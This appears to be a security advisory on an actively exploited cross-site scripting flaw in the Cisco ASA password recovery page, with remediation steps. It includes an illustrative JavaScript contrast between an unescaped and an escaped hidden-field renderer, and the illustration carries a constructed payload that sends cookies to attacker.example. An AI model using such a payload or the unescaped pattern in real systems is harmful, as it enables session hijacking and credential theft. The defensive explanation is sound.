The cross-site scripting (XSS) vulnerability in the password recovery page of Cisco Adaptive Security Appliance (ASA) software has been public for years, but its addition to CISA's Known Exploited Vulnerabilities (KEV) catalog signals that it is now being exploited in the wild. Organizations running affected versions of Cisco ASA software are exposed to credential theft and session hijacking of users who reach the affected page. Because exploitation is ongoing, the flaw is an immediate threat to system integrity and to the confidentiality of the data behind the appliance.
| Product | Cisco ASA |
| Date | 2024-11-14 11:30:09 |

Information
Technical Summary
A critical cross-site scripting (XSS) vulnerability in the password recovery page of Cisco Adaptive Security Appliance (ASA) software is being actively exploited. The page does not sufficiently filter the values of hidden input fields, so a remote attacker can inject arbitrary script into the page; the script then runs in the browser of any user who visits a crafted URL or submits a crafted form to the appliance. Successful exploitation can disclose the user's credentials or session cookie, giving the attacker unauthorized access and putting sensitive information at risk of compromise.
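The following is an added illustration of the vulnerability class described above, not code from Cisco or from the ASA software. It models a hypothetical server-side template that echoes a request parameter into a hidden input field, first without and then with attribute encoding, and uses a constructed attacker payload to show how an unescaped value breaks out of the attribute and becomes executable script. The form action, field name and payload are assumptions made for the example.

```javascript
// Hypothetical password-recovery form renderer (not Cisco's code).
// A request parameter is placed in a hidden <input>; the value is attacker-controlled.

// Constructed attacker payload: closes the value attribute and the <input> tag,
// then injects a script that sends the victim's cookie to an attacker host.
const CONSTRUCTED_PAYLOAD =
  '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Vulnerable: the untrusted value is concatenated straight into the attribute.
function renderHiddenFieldUnsafe(name, value) {
  return '<form method="post" action="/recover">' +
    '<input type="hidden" name="' + name + '" value="' + value + '">' +
    '<input type="submit" value="Recover"></form>';
}

// Attribute-encode the characters that can terminate an attribute or a tag.
function escapeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Inverse of escapeHtmlAttr, to show the server still receives the original
// string after the browser decodes the attribute. '&amp;' is decoded last so
// that a literal '&lt;' in the input is not double-decoded.
function decodeHtmlAttr(s) {
  return String(s)
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&quot;/g, '"')
    .replace(/&#39;/g, "'")
    .replace(/&amp;/g, '&');
}

// Hardened: identical markup, but every untrusted value is encoded for the
// attribute context before it is written into the page.
function renderHiddenFieldSafe(name, value) {
  return '<form method="post" action="/recover">' +
    '<input type="hidden" name="' + escapeHtmlAttr(name) +
    '" value="' + escapeHtmlAttr(value) + '">' +
    '<input type="submit" value="Recover"></form>';
}

// Crude audit check: the template never emits a <script> element, so one in the
// output can only have come from untrusted input. A real audit would parse the HTML.
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Render both variants with the constructed payload so the difference is visible.
function demo() {
  return {
    unsafe: renderHiddenFieldUnsafe('token', CONSTRUCTED_PAYLOAD),
    safe: renderHiddenFieldSafe('token', CONSTRUCTED_PAYLOAD),
  };
}

console.log(demo());
```

The vulnerable renderer turns the payload's leading `">` into the end of the attribute and tag, leaving a live `<script>` element in the page; the hardened renderer keeps the whole payload inside the quoted attribute as inert text, and the form still submits the original string to the server unchanged.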
Recommendations
Organizations using Cisco ASA software should update immediately to a release that Cisco lists as fixed for this vulnerability. Confirm the running release on each appliance (for example with `show version`) and compare it against Cisco's advisory rather than assuming a recent install is patched. Until the update is applied, limit who can reach the affected web interface and warn users of that interface to treat unexpected links to it as suspect, since the attack needs a victim to load a crafted request.
